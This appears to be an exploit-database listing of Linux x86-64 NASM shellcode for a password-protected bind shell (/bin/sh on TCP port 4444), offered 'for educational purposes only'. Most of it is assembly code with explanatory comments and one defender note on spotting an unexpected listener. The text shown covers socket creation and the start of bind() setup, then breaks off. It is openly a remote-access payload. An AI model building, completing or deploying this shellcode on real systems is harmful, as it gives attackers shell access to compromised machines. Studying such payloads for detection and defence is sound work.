Exploits / Vulnerability Discovered : 2019-08-19 |
Type : shellcode |
Platform : linux_x86-64
This shellcode — a Linux/x86_64 bind (4444/tcp) shell (/bin/sh) with password (pass), 129 bytes — is for educational purposes only; if you use it, you do so at your own risk!
; Build-time parameters (NASM %define, substituted textually into the code below).
; `pass` is stored inline as plaintext data (see `password: db pass`), so it is
; readable by anyone who can read the payload bytes; it is not a secret in any
; meaningful sense, only a gate on the accept()ed connection.
%define pass "pass"
; 4444 = 0x115C; written byte-swapped so that `push word port` lays the value
; out in network byte order (big-endian) inside sockaddr_in.sin_port.
%define port 0x5c11 ; htons(4444)
;-----------------------------------------------------------------------
; _start — payload entry point.
; Target: Linux x86-64, raw syscalls (no libc), NASM syntax.
; This stage only creates the TCP socket; on exit rdi = socket fd and the
; bind() sequence follows (label `bind:` below).
; Register roles: rax = syscall number / return value, rdi = arg0,
;                 rsi = arg1, rdx = arg2.
; Defender note: the externally observable behaviour is a process opening a
; new TCP listener on the port given by `port` (4444 per the header); a
; process that is not expected to listen on the network doing so is the
; signal to alert on.
;-----------------------------------------------------------------------
_start:
jmp real_start                          ; skip over the inline data so it is never executed as code
password: db pass                       ; plaintext credential, embedded directly in the payload body
pass_len: db $-password                 ; one byte: length of `password` (4 for "pass")
real_start:
socket:
; sock = socket(AF_INET, SOCK_STREAM, 0)
; AF_INET = 2
; SOCK_STREAM = 1
; __NR_socket = 41
; On success, a file descriptor for the new socket is returned
push 41                                 ; push imm8 / pop reg: rax = 41 (__NR_socket) in 3 bytes total
pop rax
push 2                                  ; rdi = AF_INET
pop rdi
push 1                                  ; rsi = SOCK_STREAM
pop rsi
cdq ; copies rax's bit 31 to all bits of edx (zeroes rdx) — rax = 41 so bit 31 is clear; rdx = protocol 0
syscall                                 ; rax = sockfd, or -errno on failure
push rax                                ; rdi = sockfd for the bind() call that follows
pop rdi                                 ; NOTE: the return value is never checked — on failure a
                                        ; negative errno is passed on as the descriptor
bind:
; server.sin_family = AF_INET; short
; server.sin_port = htons(4444); unsigned short
; server.sin_addr.s_addr = INADDR_ANY; unsigned long
; bzero(&server.sin_zero, 8);
;
; https://beej.us/guide/bgnet/html/multi/sockaddr_inman.html
; struct sockaddr_in {
; short sin_family;
; unsigned short sin_port;
; struct in_addr sin_addr;
; char sin_zero[8];
; };
;
; bind(sock, (struct sockaddr *)&server, sockaddr_len)
; INADDR_ANY = 0
; AF_INET = 2
; __NR_bind = 49
; On success, zero is returned
xor eax, eax ; shorter and will still zero the upper bytes
push rax ; sin_zero
push ax
push ax ; sin_addr
push word port
push word 2